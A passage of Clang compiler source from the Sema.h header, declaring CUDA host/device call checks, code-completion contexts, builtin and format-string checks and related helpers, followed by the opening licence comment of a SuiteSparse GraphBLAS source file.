bool IgnoreImplicitHDAttr = false);
CUDAFunctionTarget IdentifyCUDATarget(const ParsedAttributesView &Attrs);
/// Gets the CUDA target for the current context.
CUDAFunctionTarget CurrentCUDATarget() {
return IdentifyCUDATarget(dyn_cast<FunctionDecl>(CurContext));
}
static bool IsCUDAImplicitHostDeviceFunction(const FunctionDecl *D);
// CUDA function call preference. Must be ordered numerically from
// worst to best.
enum CUDAFunctionPreference {
CFP_Never, // Invalid caller/callee combination.
CFP_WrongSide, // Calls from host-device to host or device
// function that do not match current compilation
// mode.
CFP_HostDevice, // Any calls to host/device functions.
CFP_SameSide, // Calls from host-device to host or device
// function matching current compilation mode.
CFP_Native, // host-to-host or device-to-device calls.
};
/// Identifies relative preference of a given Caller/Callee
/// combination, based on their host/device attributes.
/// \param Caller the function which needs the address of \p Callee;
/// nullptr in case of global context.
/// \param Callee target function
///
/// \returns preference value for particular Caller/Callee combination.
CUDAFunctionPreference IdentifyCUDAPreference(const FunctionDecl *Caller,
const FunctionDecl *Callee);
/// Determines whether Caller may invoke Callee, based on their CUDA
/// host/device attributes. Returns false if the call is not allowed.
///
/// Note: Will return true for CFP_WrongSide calls. These may appear in
/// semantically correct CUDA programs, but only if they're never codegen'ed.
bool IsAllowedCUDACall(const FunctionDecl *Caller,
const FunctionDecl *Callee) {
return IdentifyCUDAPreference(Caller, Callee) != CFP_Never;
}
/// May add implicit CUDAHostAttr and CUDADeviceAttr attributes to FD,
/// depending on FD and the current compilation settings.
void maybeAddCUDAHostDeviceAttrs(FunctionDecl *FD,
const LookupResult &Previous);
public:
/// Check whether we're allowed to call Callee from the current context.
///
/// - If the call is never allowed in a semantically-correct program
/// (CFP_Never), emits an error and returns false.
///
/// - If the call is allowed in semantically-correct programs, but only if
/// it's never codegen'ed (CFP_WrongSide), creates a deferred diagnostic to
/// be emitted if and when the caller is codegen'ed, and returns true.
///
/// Will only create deferred diagnostics for a given SourceLocation once,
/// so you can safely call this multiple times without generating duplicate
/// deferred errors.
///
/// - Otherwise, returns true without emitting any diagnostics.
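/// Illustrative call site (a sketch; 'Callee' is a placeholder):
///
///  if (!CheckCUDACall(Loc, Callee))
///    return ExprError();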
bool CheckCUDACall(SourceLocation Loc, FunctionDecl *Callee);
/// Set __device__ or __host__ __device__ attributes on the given lambda
/// operator() method.
///
/// CUDA lambdas declared inside __device__ or __global__ functions inherit
/// the __device__ attribute. Similarly, lambdas inside __host__ __device__
/// functions become __host__ __device__ themselves.
void CUDASetLambdaAttrs(CXXMethodDecl *Method);
/// Finds the function in \p Matches with the highest calling priority
/// from the \p Caller context and erases all functions with lower
/// calling priority.
void EraseUnwantedCUDAMatches(
const FunctionDecl *Caller,
SmallVectorImpl<std::pair<DeclAccessPair, FunctionDecl *>> &Matches);
/// Given an implicit special member, infer its CUDA target from the
/// calls it needs to make to underlying base/field special members.
/// \param ClassDecl the class for which the member is being created.
/// \param CSM the kind of special member.
/// \param MemberDecl the special member itself.
/// \param ConstRHS true if this is a copy operation with a const object on
/// its RHS.
/// \param Diagnose true if this call should emit diagnostics.
/// \return true if there was an error inferring.
/// The result of this call is implicit CUDA target attribute(s) attached to
/// the member declaration.
bool inferCUDATargetForImplicitSpecialMember(CXXRecordDecl *ClassDecl,
CXXSpecialMember CSM,
CXXMethodDecl *MemberDecl,
bool ConstRHS,
bool Diagnose);
/// \return true if \p CD can be considered empty according to CUDA
/// (E.2.3.1 in CUDA 7.5 Programming guide).
bool isEmptyCudaConstructor(SourceLocation Loc, CXXConstructorDecl *CD);
bool isEmptyCudaDestructor(SourceLocation Loc, CXXDestructorDecl *CD);
// \brief Checks that initializers of \p Var satisfy CUDA restrictions. In
// case of error emits appropriate diagnostic and invalidates \p Var.
//
// \details CUDA allows only empty constructors as initializers for global
// variables (see E.2.3.1, CUDA 7.5). The same restriction also applies to all
// __shared__ variables whether they are local or not (they all are implicitly
// static in CUDA). One exception is that CUDA allows constant initializers
// for __constant__ and __device__ variables.
void checkAllowedCUDAInitializer(VarDecl *VD);
/// Check whether NewFD is a valid overload for CUDA. Emits
/// diagnostics and invalidates NewFD if not.
void checkCUDATargetOverload(FunctionDecl *NewFD,
const LookupResult &Previous);
/// Copies target attributes from the template TD to the function FD.
void inheritCUDATargetAttrs(FunctionDecl *FD, const FunctionTemplateDecl &TD);
/// Returns the name of the launch configuration function. This is the name
/// of the function that will be called to configure a kernel call, with the
/// parameters specified via <<<>>>.
std::string getCudaConfigureFuncName() const;
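// Illustrative: a launch such as "kern<<<grid, block>>>(args);" is lowered
// into a call of the function named here (e.g. cudaConfigureCall on older
// CUDA toolkits), followed by the call of the kernel stub.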
/// \name Code completion
//@{
/// Describes the context in which code completion occurs.
enum ParserCompletionContext {
/// Code completion occurs at top-level or namespace context.
PCC_Namespace,
/// Code completion occurs within a class, struct, or union.
PCC_Class,
/// Code completion occurs within an Objective-C interface, protocol,
/// or category.
PCC_ObjCInterface,
/// Code completion occurs within an Objective-C implementation or
/// category implementation
PCC_ObjCImplementation,
/// Code completion occurs within the list of instance variables
/// in an Objective-C interface, protocol, category, or implementation.
PCC_ObjCInstanceVariableList,
/// Code completion occurs following one or more template
/// headers.
PCC_Template,
/// Code completion occurs following one or more template
/// headers within a class.
PCC_MemberTemplate,
/// Code completion occurs within an expression.
PCC_Expression,
/// Code completion occurs within a statement, which may
/// also be an expression or a declaration.
PCC_Statement,
/// Code completion occurs at the beginning of the
/// initialization statement (or expression) in a for loop.
PCC_ForInit,
/// Code completion occurs within the condition of an if,
/// while, switch, or for statement.
PCC_Condition,
/// Code completion occurs within the body of a function on a
/// recovery path, where we do not have a specific handle on our position
/// in the grammar.
PCC_RecoveryInFunction,
/// Code completion occurs where only a type is permitted.
PCC_Type,
/// Code completion occurs in a parenthesized expression, which
/// might also be a type cast.
PCC_ParenthesizedExpression,
/// Code completion occurs within a sequence of declaration
/// specifiers within a function, method, or block.
PCC_LocalDeclarationSpecifiers
};
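// Illustrative mapping (hypothetical snippets, '^' marks the completion
// point) of source positions to the contexts above:
//   namespace N { ^ }       --> PCC_Namespace
//   class C { ^ };          --> PCC_Class
//   template <typename T> ^ --> PCC_Template
//   for (^;;) {}            --> PCC_ForInit
//   if (^)                  --> PCC_Condition
//   (^)                     --> PCC_ParenthesizedExpression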
void CodeCompleteModuleImport(SourceLocation ImportLoc, ModuleIdPath Path);
void CodeCompleteOrdinaryName(Scope *S,
ParserCompletionContext CompletionContext);
void CodeCompleteDeclSpec(Scope *S, DeclSpec &DS,
bool AllowNonIdentifiers,
bool AllowNestedNameSpecifiers);
struct CodeCompleteExpressionData;
void CodeCompleteExpression(Scope *S,
const CodeCompleteExpressionData &Data);
void CodeCompleteExpression(Scope *S, QualType PreferredType,
bool IsParenthesized = false);
void CodeCompleteMemberReferenceExpr(Scope *S, Expr *Base, Expr *OtherOpBase,
SourceLocation OpLoc, bool IsArrow,
bool IsBaseExprStatement,
QualType PreferredType);
void CodeCompletePostfixExpression(Scope *S, ExprResult LHS,
QualType PreferredType);
void CodeCompleteTag(Scope *S, unsigned TagSpec);
void CodeCompleteTypeQualifiers(DeclSpec &DS);
void CodeCompleteFunctionQualifiers(DeclSpec &DS, Declarator &D,
const VirtSpecifiers *VS = nullptr);
void CodeCompleteBracketDeclarator(Scope *S);
void CodeCompleteCase(Scope *S);
/// Reports signatures for a call to CodeCompleteConsumer and returns the
/// preferred type for the current argument. Returned type can be null.
QualType ProduceCallSignatureHelp(Scope *S, Expr *Fn, ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceConstructorSignatureHelp(Scope *S, QualType Type,
SourceLocation Loc,
ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceCtorInitMemberSignatureHelp(Scope *S, Decl *ConstructorDecl,
CXXScopeSpec SS,
ParsedType TemplateTypeTy,
ArrayRef<Expr *> ArgExprs,
IdentifierInfo *II,
SourceLocation OpenParLoc);
void CodeCompleteInitializer(Scope *S, Decl *D);
/// Trigger code completion for a record of \p BaseType. \p InitExprs are
/// expressions in the initializer list seen so far and \p D is the current
/// Designation being parsed.
void CodeCompleteDesignator(const QualType BaseType,
llvm::ArrayRef<Expr *> InitExprs,
const Designation &D);
void CodeCompleteAfterIf(Scope *S);
void CodeCompleteQualifiedId(Scope *S, CXXScopeSpec &SS, bool EnteringContext,
bool IsUsingDeclaration, QualType BaseType,
QualType PreferredType);
void CodeCompleteUsing(Scope *S);
void CodeCompleteUsingDirective(Scope *S);
void CodeCompleteNamespaceDecl(Scope *S);
void CodeCompleteNamespaceAliasDecl(Scope *S);
void CodeCompleteOperatorName(Scope *S);
void CodeCompleteConstructorInitializer(
Decl *Constructor,
ArrayRef<CXXCtorInitializer *> Initializers);
void CodeCompleteLambdaIntroducer(Scope *S, LambdaIntroducer &Intro,
bool AfterAmpersand);
void CodeCompleteObjCAtDirective(Scope *S);
void CodeCompleteObjCAtVisibility(Scope *S);
void CodeCompleteObjCAtStatement(Scope *S);
void CodeCompleteObjCAtExpression(Scope *S);
void CodeCompleteObjCPropertyFlags(Scope *S, ObjCDeclSpec &ODS);
void CodeCompleteObjCPropertyGetter(Scope *S);
void CodeCompleteObjCPropertySetter(Scope *S);
void CodeCompleteObjCPassingType(Scope *S, ObjCDeclSpec &DS,
bool IsParameter);
void CodeCompleteObjCMessageReceiver(Scope *S);
void CodeCompleteObjCSuperMessage(Scope *S, SourceLocation SuperLoc,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression);
void CodeCompleteObjCClassMessage(Scope *S, ParsedType Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
bool IsSuper = false);
void CodeCompleteObjCInstanceMessage(Scope *S, Expr *Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
ObjCInterfaceDecl *Super = nullptr);
void CodeCompleteObjCForCollection(Scope *S,
DeclGroupPtrTy IterationVar);
void CodeCompleteObjCSelector(Scope *S,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCProtocolReferences(
ArrayRef<IdentifierLocPair> Protocols);
void CodeCompleteObjCProtocolDecl(Scope *S);
void CodeCompleteObjCInterfaceDecl(Scope *S);
void CodeCompleteObjCSuperclass(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationDecl(Scope *S);
void CodeCompleteObjCInterfaceCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCPropertyDefinition(Scope *S);
void CodeCompleteObjCPropertySynthesizeIvar(Scope *S,
IdentifierInfo *PropertyName);
void CodeCompleteObjCMethodDecl(Scope *S, Optional<bool> IsInstanceMethod,
ParsedType ReturnType);
void CodeCompleteObjCMethodDeclSelector(Scope *S,
bool IsInstanceMethod,
bool AtParameterName,
ParsedType ReturnType,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCClassPropertyRefExpr(Scope *S, IdentifierInfo &ClassName,
SourceLocation ClassNameLoc,
bool IsBaseExprStatement);
void CodeCompletePreprocessorDirective(bool InConditional);
void CodeCompleteInPreprocessorConditionalExclusion(Scope *S);
void CodeCompletePreprocessorMacroName(bool IsDefinition);
void CodeCompletePreprocessorExpression();
void CodeCompletePreprocessorMacroArgument(Scope *S,
IdentifierInfo *Macro,
MacroInfo *MacroInfo,
unsigned Argument);
void CodeCompleteIncludedFile(llvm::StringRef Dir, bool IsAngled);
void CodeCompleteNaturalLanguage();
void CodeCompleteAvailabilityPlatformName();
void GatherGlobalCodeCompletions(CodeCompletionAllocator &Allocator,
CodeCompletionTUInfo &CCTUInfo,
SmallVectorImpl<CodeCompletionResult> &Results);
//@}
//===--------------------------------------------------------------------===//
// Extra semantic analysis beyond the C type system
public:
SourceLocation getLocationOfStringLiteralByte(const StringLiteral *SL,
unsigned ByteNo) const;
private:
void CheckArrayAccess(const Expr *BaseExpr, const Expr *IndexExpr,
const ArraySubscriptExpr *ASE=nullptr,
bool AllowOnePastEnd=true, bool IndexNegated=false);
void CheckArrayAccess(const Expr *E);
// Used to grab the relevant information from a FormatAttr and a
// FunctionDeclaration.
struct FormatStringInfo {
unsigned FormatIdx;
unsigned FirstDataArg;
bool HasVAListArg;
};
static bool getFormatStringInfo(const FormatAttr *Format, bool IsCXXMember,
FormatStringInfo *FSI);
bool CheckFunctionCall(FunctionDecl *FDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckObjCMethodCall(ObjCMethodDecl *Method, SourceLocation loc,
ArrayRef<const Expr *> Args);
bool CheckPointerCall(NamedDecl *NDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckOtherCall(CallExpr *TheCall, const FunctionProtoType *Proto);
void CheckConstructorCall(FunctionDecl *FDecl,
ArrayRef<const Expr *> Args,
const FunctionProtoType *Proto,
SourceLocation Loc);
void checkCall(NamedDecl *FDecl, const FunctionProtoType *Proto,
const Expr *ThisArg, ArrayRef<const Expr *> Args,
bool IsMemberFunction, SourceLocation Loc, SourceRange Range,
VariadicCallType CallType);
bool CheckObjCString(Expr *Arg);
ExprResult CheckOSLogFormatStringArg(Expr *Arg);
ExprResult CheckBuiltinFunctionCall(FunctionDecl *FDecl,
unsigned BuiltinID, CallExpr *TheCall);
bool CheckTSBuiltinFunctionCall(llvm::Triple::ArchType Arch,
unsigned BuiltinID, CallExpr *TheCall);
void checkFortifiedBuiltinMemoryFunction(FunctionDecl *FD, CallExpr *TheCall);
bool CheckARMBuiltinExclusiveCall(unsigned BuiltinID, CallExpr *TheCall,
unsigned MaxWidth);
bool CheckNeonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSVEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckCDEBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckARMCoprocessorImmediate(const Expr *CoprocArg, bool WantCDE);
bool CheckARMBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAArch64BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckBPFBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckHexagonBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinCpu(unsigned BuiltinID, CallExpr *TheCall);
bool CheckMipsBuiltinArgument(unsigned BuiltinID, CallExpr *TheCall);
bool CheckSystemZBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinRoundingOrSAE(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinGatherScatterScale(unsigned BuiltinID, CallExpr *TheCall);
bool CheckX86BuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckPPCBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool CheckAMDGCNBuiltinFunctionCall(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStart(unsigned BuiltinID, CallExpr *TheCall);
bool SemaBuiltinVAStartARMMicrosoft(CallExpr *Call);
bool SemaBuiltinUnorderedCompare(CallExpr *TheCall);
bool SemaBuiltinFPClassification(CallExpr *TheCall, unsigned NumArgs);
bool SemaBuiltinVSX(CallExpr *TheCall);
bool SemaBuiltinOSLogFormat(CallExpr *TheCall);
public:
// Used by C++ template instantiation.
ExprResult SemaBuiltinShuffleVector(CallExpr *TheCall);
ExprResult SemaConvertVectorExpr(Expr *E, TypeSourceInfo *TInfo,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
private:
bool SemaBuiltinPrefetch(CallExpr *TheCall);
bool SemaBuiltinAllocaWithAlign(CallExpr *TheCall);
bool SemaBuiltinAssume(CallExpr *TheCall);
bool SemaBuiltinAssumeAligned(CallExpr *TheCall);
bool SemaBuiltinLongjmp(CallExpr *TheCall);
bool SemaBuiltinSetjmp(CallExpr *TheCall);
ExprResult SemaBuiltinAtomicOverloaded(ExprResult TheCallResult);
ExprResult SemaBuiltinNontemporalOverloaded(ExprResult TheCallResult);
ExprResult SemaAtomicOpsOverloaded(ExprResult TheCallResult,
AtomicExpr::AtomicOp Op);
ExprResult SemaBuiltinOperatorNewDeleteOverloaded(ExprResult TheCallResult,
bool IsDelete);
bool SemaBuiltinConstantArg(CallExpr *TheCall, int ArgNum,
llvm::APSInt &Result);
bool SemaBuiltinConstantArgRange(CallExpr *TheCall, int ArgNum, int Low,
int High, bool RangeIsError = true);
bool SemaBuiltinConstantArgMultiple(CallExpr *TheCall, int ArgNum,
unsigned Multiple);
bool SemaBuiltinConstantArgPower2(CallExpr *TheCall, int ArgNum);
bool SemaBuiltinConstantArgShiftedByte(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinConstantArgShiftedByteOrXXFF(CallExpr *TheCall, int ArgNum,
unsigned ArgBits);
bool SemaBuiltinARMSpecialReg(unsigned BuiltinID, CallExpr *TheCall,
int ArgNum, unsigned ExpectedFieldNum,
bool AllowName);
bool SemaBuiltinARMMemoryTaggingCall(unsigned BuiltinID, CallExpr *TheCall);
public:
enum FormatStringType {
FST_Scanf,
FST_Printf,
FST_NSString,
FST_Strftime,
FST_Strfmon,
FST_Kprintf,
FST_FreeBSDKPrintf,
FST_OSTrace,
FST_OSLog,
FST_Unknown
};
static FormatStringType GetFormatStringType(const FormatAttr *Format);
bool FormatStringHasSArg(const StringLiteral *FExpr);
static bool GetFormatNSStringIdx(const FormatAttr *Format, unsigned &Idx);
private:
bool CheckFormatArguments(const FormatAttr *Format,
ArrayRef<const Expr *> Args,
bool IsCXXMember,
VariadicCallType CallType,
SourceLocation Loc, SourceRange Range,
llvm::SmallBitVector &CheckedVarArgs);
bool CheckFormatArguments(ArrayRef<const Expr *> Args,
bool HasVAListArg, unsigned format_idx,
unsigned firstDataArg, FormatStringType Type,
VariadicCallType CallType,
SourceLocation Loc, SourceRange range,
llvm::SmallBitVector &CheckedVarArgs);
void CheckAbsoluteValueFunction(const CallExpr *Call,
const FunctionDecl *FDecl);
void CheckMaxUnsignedZero(const CallExpr *Call, const FunctionDecl *FDecl);
void CheckMemaccessArguments(const CallExpr *Call,
unsigned BId,
IdentifierInfo *FnName);
void CheckStrlcpycatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckStrncatArguments(const CallExpr *Call,
IdentifierInfo *FnName);
void CheckReturnValExpr(Expr *RetValExp, QualType lhsType,
SourceLocation ReturnLoc,
bool isObjCMethod = false,
const AttrVec *Attrs = nullptr,
const FunctionDecl *FD = nullptr);
public:
void CheckFloatComparison(SourceLocation Loc, Expr *LHS, Expr *RHS);
private:
void CheckImplicitConversions(Expr *E, SourceLocation CC = SourceLocation());
void CheckBoolLikeConversion(Expr *E, SourceLocation CC);
void CheckForIntOverflow(Expr *E);
void CheckUnsequencedOperations(const Expr *E);
/// Perform semantic checks on a completed expression. This will either
/// be a full-expression or a default argument expression.
void CheckCompletedExpr(Expr *E, SourceLocation CheckLoc = SourceLocation(),
bool IsConstexpr = false);
void CheckBitFieldInitialization(SourceLocation InitLoc, FieldDecl *Field,
Expr *Init);
/// Check if there is a field shadowing.
void CheckShadowInheritedFields(const SourceLocation &Loc,
DeclarationName FieldName,
const CXXRecordDecl *RD,
bool DeclIsField = true);
/// Check if the given expression contains a 'break' or 'continue'
/// statement that produces control flow different from GCC's.
void CheckBreakContinueBinding(Expr *E);
/// Check whether the receiver is a mutable ObjC container which
/// attempts to add itself into the container.
void CheckObjCCircularContainer(ObjCMessageExpr *Message);
void AnalyzeDeleteExprMismatch(const CXXDeleteExpr *DE);
void AnalyzeDeleteExprMismatch(FieldDecl *Field, SourceLocation DeleteLoc,
bool DeleteWasArrayForm);
public:
/// Register a magic integral constant to be used as a type tag.
void RegisterTypeTagForDatatype(const IdentifierInfo *ArgumentKind,
uint64_t MagicValue, QualType Type,
bool LayoutCompatible, bool MustBeNull);
struct TypeTagData {
TypeTagData() {}
TypeTagData(QualType Type, bool LayoutCompatible, bool MustBeNull) :
Type(Type), LayoutCompatible(LayoutCompatible),
MustBeNull(MustBeNull)
{}
QualType Type;
/// If true, \c Type should be compared with other expression's types for
/// layout-compatibility.
unsigned LayoutCompatible : 1;
unsigned MustBeNull : 1;
};
/// A pair of ArgumentKind identifier and magic value. This uniquely
/// identifies the magic value.
typedef std::pair<const IdentifierInfo *, uint64_t> TypeTagMagicValue;
private:
/// A map from magic value to type information.
std::unique_ptr<llvm::DenseMap<TypeTagMagicValue, TypeTagData>>
TypeTagForDatatypeMagicValues;
/// Perform checks on a call of a function with argument_with_type_tag
/// or pointer_with_type_tag attributes.
void CheckArgumentWithTypeTag(const ArgumentWithTypeTagAttr *Attr,
const ArrayRef<const Expr *> ExprArgs,
SourceLocation CallSiteLoc);
/// Check if we are taking the address of a packed field
/// as this may be a problem if the pointer value is dereferenced.
void CheckAddressOfPackedMember(Expr *rhs);
/// The parser's current scope.
///
/// The parser maintains this state here.
Scope *CurScope;
mutable IdentifierInfo *Ident_super;
mutable IdentifierInfo *Ident___float128;
/// Nullability type specifiers.
IdentifierInfo *Ident__Nonnull = nullptr;
IdentifierInfo *Ident__Nullable = nullptr;
IdentifierInfo *Ident__Null_unspecified = nullptr;
IdentifierInfo *Ident_NSError = nullptr;
/// The handler for the FileChanged preprocessor events.
///
/// Used for diagnostics that implement custom semantic analysis for #include
/// directives, like -Wpragma-pack.
sema::SemaPPCallbacks *SemaPPCallbackHandler;
protected:
friend class Parser;
friend class InitializationSequence;
friend class ASTReader;
friend class ASTDeclReader;
friend class ASTWriter;
public:
/// Retrieve the keyword associated with the given nullability kind.
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability);
/// The struct behind the CFErrorRef pointer.
RecordDecl *CFError = nullptr;
bool isCFError(RecordDecl *D);
/// Retrieve the identifier "NSError".
IdentifierInfo *getNSErrorIdent();
/// Retrieve the parser's current scope.
///
/// This routine must only be used when it is certain that semantic analysis
/// and the parser are in precisely the same context, which is not the case
/// when, e.g., we are performing any kind of template instantiation.
/// Therefore, the only safe places to use this scope are in the parser
/// itself and in routines directly invoked from the parser and *never* from
/// template substitution or instantiation.
Scope *getCurScope() const { return CurScope; }
void incrementMSManglingNumber() const {
return CurScope->incrementMSManglingNumber();
}
IdentifierInfo *getSuperIdentifier() const;
IdentifierInfo *getFloat128Identifier() const;
Decl *getObjCDeclContext() const;
DeclContext *getCurLexicalContext() const {
return OriginalLexicalContext ? OriginalLexicalContext : CurContext;
}
const DeclContext *getCurObjCLexicalContext() const {
const DeclContext *DC = getCurLexicalContext();
// A category implicitly has the attribute of the interface.
if (const ObjCCategoryDecl *CatD = dyn_cast<ObjCCategoryDecl>(DC))
DC = CatD->getClassInterface();
return DC;
}
/// Determine the number of levels of enclosing template parameters. This is
/// only usable while parsing. Note that this does not include dependent
/// contexts in which no template parameters have yet been declared, such as
/// in a terse function template or generic lambda before the first 'auto' is
/// encountered.
unsigned getTemplateDepth(Scope *S) const;
/// To be used for checking whether the arguments being passed to a
/// function exceed the number of parameters expected for it.
static bool TooManyArguments(size_t NumParams, size_t NumArgs,
bool PartialOverloading = false) {
// We check whether we're just after a comma in code-completion.
if (NumArgs > 0 && PartialOverloading)
return NumArgs + 1 > NumParams; // If so, we view as an extra argument.
return NumArgs > NumParams;
}
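// Worked example: for void f(int, int) (NumParams == 2), a completion right
// after the comma in "f(1, 2, " has NumArgs == 2 with PartialOverloading
// true, so the pending argument counts as a 3rd one and 3 > 2 flags the call;
// a finished call "f(1, 2)" gives 2 > 2 == false.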
// Emitting members of dllexported classes is delayed until the class
// (including field initializers) is fully parsed.
SmallVector<CXXRecordDecl*, 4> DelayedDllExportClasses;
SmallVector<CXXMethodDecl*, 4> DelayedDllExportMemberFunctions;
private:
int ParsingClassDepth = 0;
class SavePendingParsedClassStateRAII {
public:
SavePendingParsedClassStateRAII(Sema &S) : S(S) { swapSavedState(); }
~SavePendingParsedClassStateRAII() {
assert(S.DelayedOverridingExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
assert(S.DelayedEquivalentExceptionSpecChecks.empty() &&
"there shouldn't be any pending delayed exception spec checks");
swapSavedState();
}
private:
Sema &S;
decltype(DelayedOverridingExceptionSpecChecks)
SavedOverridingExceptionSpecChecks;
decltype(DelayedEquivalentExceptionSpecChecks)
SavedEquivalentExceptionSpecChecks;
void swapSavedState() {
SavedOverridingExceptionSpecChecks.swap(
S.DelayedOverridingExceptionSpecChecks);
SavedEquivalentExceptionSpecChecks.swap(
S.DelayedEquivalentExceptionSpecChecks);
}
};
/// Helper class that collects misaligned member designations and
/// their location info for delayed diagnostics.
struct MisalignedMember {
Expr *E;
RecordDecl *RD;
ValueDecl *MD;
CharUnits Alignment;
MisalignedMember() : E(), RD(), MD(), Alignment() {}
MisalignedMember(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment)
: E(E), RD(RD), MD(MD), Alignment(Alignment) {}
explicit MisalignedMember(Expr *E)
: MisalignedMember(E, nullptr, nullptr, CharUnits()) {}
bool operator==(const MisalignedMember &m) { return this->E == m.E; }
};
/// Small set of gathered accesses to potentially misaligned members
/// due to the packed attribute.
SmallVector<MisalignedMember, 4> MisalignedMembers;
/// Adds an expression to the set of gathered misaligned members.
void AddPotentialMisalignedMembers(Expr *E, RecordDecl *RD, ValueDecl *MD,
CharUnits Alignment);
public:
/// Diagnoses the current set of gathered accesses. This typically
/// happens at full expression level. The set is cleared after emitting the
/// diagnostics.
void DiagnoseMisalignedMembers();
/// This function checks whether the expression is in the set of potentially
/// misaligned members and is being converted to some pointer type T with
/// lower or equal alignment requirements. If so, it removes the expression
/// from the set. This is used when we do not want to diagnose such misaligned
/// accesses (e.g. in conversions to void*).
void DiscardMisalignedMemberAddress(const Type *T, Expr *E);
/// This function calls Action when it determines that E designates a
/// misaligned member due to the packed attribute. This is used to emit
/// local diagnostics like in reference binding.
void RefersToMemberWithReducedAlignment(
Expr *E,
llvm::function_ref<void(Expr *, RecordDecl *, FieldDecl *, CharUnits)>
Action);
/// Describes the reason a calling convention specification was ignored, used
/// for diagnostics.
enum class CallingConventionIgnoredReason {
ForThisTarget = 0,
VariadicFunction,
ConstructorDestructor,
BuiltinFunction
};
};
/// RAII object that enters a new expression evaluation context.
class EnterExpressionEvaluationContext {
Sema &Actions;
bool Entered = true;
public:
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Decl *LambdaContextDecl = nullptr,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other,
bool ShouldEnter = true)
: Actions(Actions), Entered(ShouldEnter) {
if (Entered)
Actions.PushExpressionEvaluationContext(NewContext, LambdaContextDecl,
ExprContext);
}
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Sema::ReuseLambdaContextDecl_t,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other)
: Actions(Actions) {
Actions.PushExpressionEvaluationContext(
NewContext, Sema::ReuseLambdaContextDecl, ExprContext);
}
enum InitListTag { InitList };
EnterExpressionEvaluationContext(Sema &Actions, InitListTag,
bool ShouldEnter = true)
: Actions(Actions), Entered(false) {
// In C++11 onwards, narrowing checks are performed on the contents of
// braced-init-lists, even when they occur within unevaluated operands.
// Therefore we still need to instantiate constexpr functions used in such
// a context.
if (ShouldEnter && Actions.isUnevaluatedContext() &&
Actions.getLangOpts().CPlusPlus11) {
Actions.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::UnevaluatedList);
Entered = true;
}
}
~EnterExpressionEvaluationContext() {
if (Entered)
Actions.PopExpressionEvaluationContext();
}
};
DeductionFailureInfo
MakeDeductionFailureInfo(ASTContext &Context, Sema::TemplateDeductionResult TDK,
sema::TemplateDeductionInfo &Info);
/// Contains a late templated function.
/// Will be parsed at the end of the translation unit, used by Sema & Parser.
struct LateParsedTemplate {
CachedTokens Toks;
/// The template function declaration to be late parsed.
Decl *D;
};
} // end namespace clang
namespace llvm {
// Hash a FunctionDeclAndLoc by looking at both its FunctionDecl and its
// SourceLocation.
template <> struct DenseMapInfo<clang::Sema::FunctionDeclAndLoc> {
using FunctionDeclAndLoc = clang::Sema::FunctionDeclAndLoc;
using FDBaseInfo = DenseMapInfo<clang::CanonicalDeclPtr<clang::FunctionDecl>>;
static FunctionDeclAndLoc getEmptyKey() {
return {FDBaseInfo::getEmptyKey(), clang::SourceLocation()};
}
static FunctionDeclAndLoc getTombstoneKey() {
return {FDBaseInfo::getTombstoneKey(), clang::SourceLocation()};
}
static unsigned getHashValue(const FunctionDeclAndLoc &FDL) {
return hash_combine(FDBaseInfo::getHashValue(FDL.FD),
FDL.Loc.getRawEncoding());
}
static bool isEqual(const FunctionDeclAndLoc &LHS,
const FunctionDeclAndLoc &RHS) {
return LHS.FD == RHS.FD && LHS.Loc == RHS.Loc;
}
};
} // namespace llvm
#endif
|
GB_unaryop__minv_uint32_fp32.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
